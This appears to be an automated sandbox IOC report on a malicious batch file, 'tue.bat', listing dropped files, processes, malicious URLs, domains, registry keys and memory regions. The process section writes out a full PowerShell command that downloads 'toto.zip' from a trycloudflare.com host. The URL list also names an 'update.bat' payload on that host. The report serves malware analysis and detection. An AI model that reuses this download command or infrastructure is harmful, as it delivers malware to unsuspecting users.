IOC Report
tue.bat

loading gif

Files

File Path
Type
Category
Malicious
tue.bat
Unicode text, UTF-8 text, with very long lines (1432), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\240a9e19-10ee-407b-85fc-8588ca98609e.tmp
JSON data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF5de1ef.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\e3a50815-4691-4e7c-b207-6816fd8b5e5c.tmp
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7204
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\MSIcd707.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12vwqu45.q23.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asfxedrt.wct.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_im3gwrfy.zvn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3ouqwti.wta.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-25 13-47-15-303.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\495ac358-139b-4377-a75b-fa8980d8a934.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\6e1cd552-e4fe-4ac9-adb0-246bce765804.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\900550a3-c69c-4aaa-9612-8e95ca683a39.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\bef65abf-e021-41a7-9ebe-7522f5564ccb.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
dropped
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped
There are 42 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tue.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LHEPQPGEWF.pdf"
C:\Windows\System32\timeout.exe
timeout /t 5
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1716,i,430510198886820409,3789369524464205952,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://michael-scanned-motherboard-reforms.trycloudflare.com/
unknown
malicious
https://michael-scanned-motherboard-reforms.trycloud
unknown
malicious
https://michael-scanned-motherboard-reforms.trycloudflare.com
unknown
malicious
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://x1.i.lencr.org/
unknown
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip=
unknown
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip~
unknown
https://michael-scanned-motherboard-reforms.trycloudflare.com/update.bat
unknown
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipy
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://go.microsoft.co
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipr
unknown
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipaA
unknown
https://github.com/Pester/Pester
unknown
https://michael-scanned-motherboard-reforms.trycloudflare.com/34e089
unknown
https://www.adobe.co
unknown
http://crl.m
unknown
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zipV
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://michael-scanned-motherboard-reforms.trycloudflare.com/toto.zip7u
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://oneget.org
unknown
There are 21 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
michael-scanned-motherboard-reforms.trycloudflare.com
unknown
malicious
bg.microsoft.map.fastly.net
199.232.210.172
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
217.20.57.18
x1.i.lencr.org
unknown

IPs

IP
Domain
Country
Malicious
96.7.168.138
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
54CA23E000
stack
page read and write
1B7CC340000
heap
page read and write
7FFA9FBCD000
trusted library allocation
page execute and read and write
17AB0F77000
heap
page read and write
1B7B3B20000
heap
page execute and read and write
17A96EF7000
heap
page read and write
1B7CBD1D000
heap
page read and write
7FFA9FF10000
trusted library allocation
page read and write
779113B000
stack
page read and write
1B7CBBB3000
heap
page read and write
17A96ED6000
heap
page read and write
17AB1030000
heap
page read and write
7FFA9FD60000
trusted library allocation
page read and write
1B7B5420000
trusted library allocation
page read and write
54CA2BF000
stack
page read and write
7FFA9FF20000
trusted library allocation
page read and write
1B7B1C8E000
heap
page read and write
1B7B3654000
heap
page read and write
7FFB0B610000
unkown
page readonly
1B7B39C0000
trusted library allocation
page read and write
1B7CBCFC000
heap
page read and write
7FFA9FD80000
trusted library allocation
page execute and read and write
1B7C3C27000
trusted library allocation
page read and write
7FFA9FEA0000
trusted library allocation
page read and write
7FFA9FDF0000
trusted library allocation
page read and write
1B7B1E60000
heap
page read and write
7FFA9FEC0000
trusted library allocation
page read and write
1B7B1CB5000
heap
page read and write
7FFA9FEB0000
trusted library allocation
page read and write
7FFA9FCE0000
trusted library allocation
page execute and read and write
7790AFD000
stack
page read and write
1B7B3656000
heap
page read and write
1B7CBDB7000
heap
page read and write
58497F000
stack
page read and write
54CAE0E000
stack
page read and write
779103E000
stack
page read and write
779075F000
stack
page read and write
7FFA9FE80000
trusted library allocation
page read and write
7FFA9FC7C000
trusted library allocation
page execute and read and write
77910BE000
stack
page read and write
1B7B1E20000
heap
page read and write
7FFA9FD7A000
trusted library allocation
page read and write
17A988D3000
trusted library allocation
page read and write
1B7B1E00000
heap
page read and write
1B7B1C20000
heap
page read and write
7FFB0B630000
unkown
page read and write
7791B8D000
stack
page read and write
1B7B5596000
trusted library allocation
page read and write
17AB0EF3000
heap
page read and write
7FFA9FEA0000
trusted library allocation
page read and write
54CAD8E000
stack
page read and write
7790F3E000
stack
page read and write
1B7CBCED000
heap
page read and write
17A97210000
heap
page read and write
7FFB0B632000
unkown
page readonly
7FFA9FD80000
trusted library allocation
page execute and read and write
7FFA9FE90000
trusted library allocation
page read and write
17A96F8E000
heap
page read and write
15366AA8000
heap
page read and write
17A96E60000
heap
page read and write
7FFA9FBC4000
trusted library allocation
page read and write
7FFA9FBC3000
trusted library allocation
page execute and read and write
1B7B1CFD000
heap
page read and write
1B7CBE86000
heap
page execute and read and write
7FFA9FDC0000
trusted library allocation
page read and write
1B7B3BB1000
trusted library allocation
page read and write
7790DB7000
stack
page read and write
17A98EA1000
trusted library allocation
page read and write
1B7CBDC0000
heap
page execute and read and write
7FFA9FC80000
trusted library allocation
page execute and read and write
54C9D7E000
stack
page read and write
1B7CBF94000
heap
page read and write
7FFA9FC70000
trusted library allocation
page read and write
54C9E7F000
stack
page read and write
1B7B5729000
trusted library allocation
page read and write
1B7B3C2E000
trusted library allocation
page read and write
7FFA9FBD0000
trusted library allocation
page read and write
7790C7E000
stack
page read and write
17A96F0F000
heap
page read and write
1B7B39A0000
trusted library allocation
page read and write
17A98D37000
heap
page execute and read and write
7791B0F000
stack
page read and write
15368380000
heap
page read and write
17AB0EF1000
heap
page read and write
17AB11FB000
heap
page read and write
7FFA9FE70000
trusted library allocation
page read and write
7FFA9FDC0000
trusted library allocation
page read and write
17A9AAE2000
trusted library allocation
page read and write
17AA905A000
trusted library allocation
page read and write
17A98910000
trusted library allocation
page read and write
7FFA9FE00000
trusted library allocation
page read and write
1B7B1CB9000
heap
page read and write
7FFA9FE10000
trusted library allocation
page read and write
7FFA9FF00000
trusted library allocation
page read and write
54C9C7E000
stack
page read and write
7FFA9FDE0000
trusted library allocation
page read and write
54CAE8D000
stack
page read and write
5848FF000
stack
page read and write
54CA03E000
stack
page read and write
17A98D40000
heap
page read and write
17A98E90000
heap
page execute and read and write
7FFA9FBCD000
trusted library allocation
page execute and read and write
7790E3A000
stack
page read and write
17A988D0000
trusted library allocation
page read and write
7790A7E000
stack
page read and write
1B7CBE80000
heap
page execute and read and write
7FFA9FBC3000
trusted library allocation
page execute and read and write
1B7B1C7A000
heap
page read and write
17A97214000
heap
page read and write
7FFA9FCA6000
trusted library allocation
page execute and read and write
7FFB0B630000
unkown
page read and write
17A96EEE000
heap
page read and write
7FFA9FE20000
trusted library allocation
page read and write
1B7CBCC0000
heap
page read and write
17A96EF5000
heap
page read and write
1B7B3DE3000
trusted library allocation
page read and write
15366BA0000
heap
page read and write
1B7C3BC1000
trusted library allocation
page read and write
17AA8EA1000
trusted library allocation
page read and write
7FFA9FD7A000
trusted library allocation
page read and write
7FFA9FD90000
trusted library allocation
page execute and read and write
7FFA9FCA6000
trusted library allocation
page execute and read and write
7FFA9FD71000
trusted library allocation
page read and write
17A9A493000
trusted library allocation
page read and write
7FFA9FE60000
trusted library allocation
page read and write
17A96E40000
heap
page read and write
17A990D2000
trusted library allocation
page read and write
1B7B57F2000
trusted library allocation
page read and write
17AB0F85000
heap
page read and write
17A98F29000
trusted library allocation
page read and write
7790D3E000
stack
page read and write
17AB1204000
heap
page read and write
17AB121B000
heap
page read and write
17A98924000
heap
page read and write
7FFA9FEE0000
trusted library allocation
page read and write
1B7B3650000
heap
page read and write
7FFA9FEB0000
trusted library allocation
page read and write
7790FBF000
stack
page read and write
7FFA9FEF0000
trusted library allocation
page read and write
1B7C3D69000
trusted library allocation
page read and write
17AB0EA5000
heap
page read and write
1B7CBFEC000
heap
page read and write
17A98926000
heap
page read and write
7FFA9FE30000
trusted library allocation
page read and write
7790B7E000
stack
page read and write
17AB0F7E000
heap
page read and write
17A96EC2000
heap
page read and write
7FFA9FDB0000
trusted library allocation
page execute and read and write
1B7CBEB3000
heap
page read and write
1B7B51A0000
trusted library allocation
page read and write
17A98880000
trusted library allocation
page read and write
17A96EFD000
heap
page read and write
54C9FF9000
stack
page read and write
1B7B3A13000
trusted library allocation
page read and write
1B7CBF90000
heap
page read and write
17AB0EA0000
heap
page read and write
7FFB0B611000
unkown
page execute read
17A98920000
heap
page read and write
1B7CC002000
heap
page read and write
1B7B3A50000
trusted library allocation
page read and write
17AB0F56000
heap
page read and write
1B7B1C6E000
heap
page read and write
1B7B57EE000
trusted library allocation
page read and write
7FFA9FD60000
trusted library allocation
page read and write
77906D3000
stack
page read and write
7FFA9FF00000
trusted library allocation
page read and write
1B7CBEB0000
heap
page read and write
7FFA9FBC4000
trusted library allocation
page read and write
54CA1B9000
stack
page read and write
1B7B54A7000
trusted library allocation
page read and write
17AB0F5D000
heap
page read and write
17A96FA4000
heap
page read and write
17A99AD2000
trusted library allocation
page read and write
17AB11DD000
heap
page read and write
7FFA9FED0000
trusted library allocation
page read and write
17A9AAE6000
trusted library allocation
page read and write
17A98D51000
heap
page read and write
1B7B3610000
heap
page read and write
1B7C3C33000
trusted library allocation
page read and write
7FFA9FBC2000
trusted library allocation
page read and write
1B7B47E3000
trusted library allocation
page read and write
7FFA9FE70000
trusted library allocation
page read and write
1B7CC000000
heap
page read and write
1B7B1E64000
heap
page read and write
7790BFE000
stack
page read and write
1B7CBF9A000
heap
page read and write
7FFB0B635000
unkown
page readonly
7FFA9FD71000
trusted library allocation
page read and write
17A96E30000
heap
page read and write
54C9CFF000
stack
page read and write
7FFA9FE90000
trusted library allocation
page read and write
153684E0000
heap
page read and write
17A9AA1C000
trusted library allocation
page read and write
17A96EF9000
heap
page read and write
54CA0B7000
stack
page read and write
7FFA9FE40000
trusted library allocation
page read and write
7FFA9FD90000
trusted library allocation
page execute and read and write
54CA13D000
stack
page read and write
1B7B3BA0000
heap
page read and write
153669C0000
heap
page read and write
7FFA9FC80000
trusted library allocation
page execute and read and write
7FFA9FDD0000
trusted library allocation
page read and write
1B7C3BB1000
trusted library allocation
page read and write
7FFA9FBDB000
trusted library allocation
page read and write
1B7CBD7F000
heap
page read and write
17A9A714000
trusted library allocation
page read and write
54C99E3000
stack
page read and write
7FFA9FEE0000
trusted library allocation
page read and write
7FFA9FCE0000
trusted library allocation
page execute and read and write
7FFA9FE20000
trusted library allocation
page read and write
7FFA9FBC2000
trusted library allocation
page read and write
7FFA9FE80000
trusted library allocation
page read and write
1B7CBD1F000
heap
page read and write
17A98890000
heap
page readonly
1B7B544B000
trusted library allocation
page read and write
7FFA9FDD0000
trusted library allocation
page read and write
17AA8F17000
trusted library allocation
page read and write
17AB0F4D000
heap
page read and write
7FFA9FF20000
trusted library allocation
page read and write
7FFA9FE50000
trusted library allocation
page read and write
54C9F7D000
stack
page read and write
7FFA9FC70000
trusted library allocation
page read and write
1B7B1C30000
heap
page read and write
17AA8EB0000
trusted library allocation
page read and write
17A96F35000
heap
page read and write
1B7CBFF6000
heap
page read and write
7FFA9FBD0000
trusted library allocation
page read and write
17A9A740000
trusted library allocation
page read and write
7FFA9FC76000
trusted library allocation
page read and write
17AB120D000
heap
page read and write
17A98830000
heap
page read and write
7FFA9FDA2000
trusted library allocation
page read and write
7FFA9FE30000
trusted library allocation
page read and write
17A98860000
trusted library allocation
page read and write
17AB0F2F000
heap
page read and write
54C9EFE000
stack
page read and write
1B7B1C74000
heap
page read and write
17A9A4B5000
trusted library allocation
page read and write
1B7CBFA3000
heap
page read and write
7FFA9FBDB000
trusted library allocation
page read and write
58487C000
stack
page read and write
17A9A79B000
trusted library allocation
page read and write
7FFA9FEC0000
trusted library allocation
page read and write
1B7CBCC3000
heap
page read and write
7FFB0B626000
unkown
page readonly
17A96EB0000
heap
page read and write
17AB11D0000
heap
page read and write
7DF423070000
trusted library allocation
page execute and read and write
1B7CBFD0000
heap
page read and write
17A98E60000
heap
page execute and read and write
54C9DFD000
stack
page read and write
15366AA0000
heap
page read and write
7FFA9FE10000
trusted library allocation
page read and write
54CA33E000
stack
page read and write
1B7CBD17000
heap
page read and write
7FFA9FDE0000
trusted library allocation
page read and write
7FFA9FDF0000
trusted library allocation
page read and write
7FFA9FF10000
trusted library allocation
page read and write
7FFA9FEF0000
trusted library allocation
page read and write
1B7B3A10000
trusted library allocation
page read and write
7790CF8000
stack
page read and write
7FFA9FE00000
trusted library allocation
page read and write
7790EB8000
stack
page read and write
7FFA9FDA2000
trusted library allocation
page read and write
17AB11C0000
heap
page read and write
7FFA9FC7C000
trusted library allocation
page execute and read and write
17A98D30000
heap
page execute and read and write
7FFA9FED0000
trusted library allocation
page read and write
1B7B1C70000
heap
page read and write
7FFA9FDB0000
trusted library allocation
page execute and read and write
7FFA9FE40000
trusted library allocation
page read and write
153684E4000
heap
page read and write
17A96F3A000
heap
page read and write
77907DF000
stack
page read and write
54CA3BB000
stack
page read and write
7FFA9FE50000
trusted library allocation
page read and write
7FFA9FE60000
trusted library allocation
page read and write
1B7B39D0000
heap
page readonly
17A96F37000
heap
page read and write
7FFA9FC76000
trusted library allocation
page read and write
There are 270 hidden memdumps, click here to show them.